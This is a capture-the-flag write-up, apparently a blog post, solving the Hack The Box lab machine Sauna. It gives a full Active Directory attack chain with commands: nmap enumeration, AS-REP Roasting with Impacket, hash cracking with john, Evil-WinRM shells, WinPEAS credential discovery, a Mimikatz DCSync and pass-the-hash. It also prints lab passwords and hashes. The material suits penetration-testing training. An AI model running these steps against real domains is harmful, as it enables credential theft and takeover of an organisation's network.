Sauna
Hacking For RamenSauna is a great machine for sharpening your Active Directory skills.
To solve this machine you have to properly enumerate the domain, and with a pinch of OSINT, find the correct username.
The hash for the user might be captured by the AS-REP Roasting attack.
To get the root you have to escalate privileges by stepping aside to another account for the DCSync attack.
The machine itself is pretty similar to the Forest, I tried to use the slightly different toolkit.
Toolkit
- Impacket for AS-REP Roasting
- Evil-WinRM to spawn shells and import scripts
- PEASS for Privilege Escalation part
- Mimikatz for getting the Admin hash
Enumeration
Checking all ports with -p- flag:
nmap -sS -sV -p- 10.10.10.175 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 15:41 EDT Nmap scan report for htb.local (10.10.10.175) Host is up (0.022s latency). Not shown: 65515 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-29 02:48:43Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49686/tcp open msrpc Microsoft Windows RPC 64265/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.80%I=7%D=3/28%Time=5E7FA986%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 395.84 seconds
By exploring the port 80 you have to find the list of users. That part is a bit CTF-ish, but you need to know the correct username to perform the AS-REP Roasting attack.
Fergus Smith Shaun Coins Bowie Taylor Sophie Driver Hugo Bear Steven Kerb
From those names, we're creating a list with common patterns used in AD.
Fergus Smith might be represented as fsmith, or Fergus.Smith, or FerSm, etc.
Exploitation
Firing up the Impacket
python3 GetNPUsers.py GOTISTICAL-BANK.LOCAL/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.175 -no-pass
We go a Kerberos ticket for user fsmith:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:caa59cf44d7cbdadfe91940e4a9433b0$c541f3fb39f017ee166fbb87d5c5c02578c8e9d993b30442f63e5d13be3bbc34e73616ea851a40fbea5ddab5a11ab41c0d3712b73755528fed1ae059e72ea21742e7309540a42d5cbd56fa4fca0d4f69935eadcbcee8bb9a6351cbeb0d27552be9da2e2fd6aa3e3106c4d808c8c5da9e5384f5b59ca907a137e889ae84c8d29a97616c59d8a3f92d2afd738ba2e1896011198eb374dfabfeaa6caa35c3c7b9fb01edaecd52d77e6305896e170c7432b450e799226baa99c23c87ea0c334cbcfb0c9fee5f7217009fb51068d32c94cee0f9ca115045712c9e5abd3d926cb77c25487e617ac09a478195d2f6f20b8264846263cebef81a9248d362eb7497f91a6c
Cracking this hash with john:
john --wordlist=./rockyou.txt hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:18 DONE (2020-03-31 10:49) 0.05390g/s 568140p/s 568140c/s 568140C/s Thines..Thehulk2008 Use the "--show" option to display all of the cracked passwords reliably Session completed
Get the user flag with the Evil-WinRM:
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
PrivEsc
One of my new favorite tools can handle the PrivEsc part - WinPEAS Windows Privilege Escalation Awesome Scripts is a part of the toolkit named PEASS - Privilege Escalation Awesome Scripts SUITE
It can be easily imported by Evin-WinRM by upload function or by specifying -e flag when you're starting a shell.
WinPEAS discover some autologon credentials on the machine:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : 35mEGOTISTICALBANK
DefaultUserName : 35mEGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Firing up another shell:
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
It’s a great chance to try out a mimikatz. And again, -e or upload to pass the exploit to the machine:
./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
Mimikatz will return the NTLM hash for user Administrator. The last step is to open another shell as the Administrator. Evil-WinRM have the -H flag, it’s the same as Pass-the-Hash attack:
evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff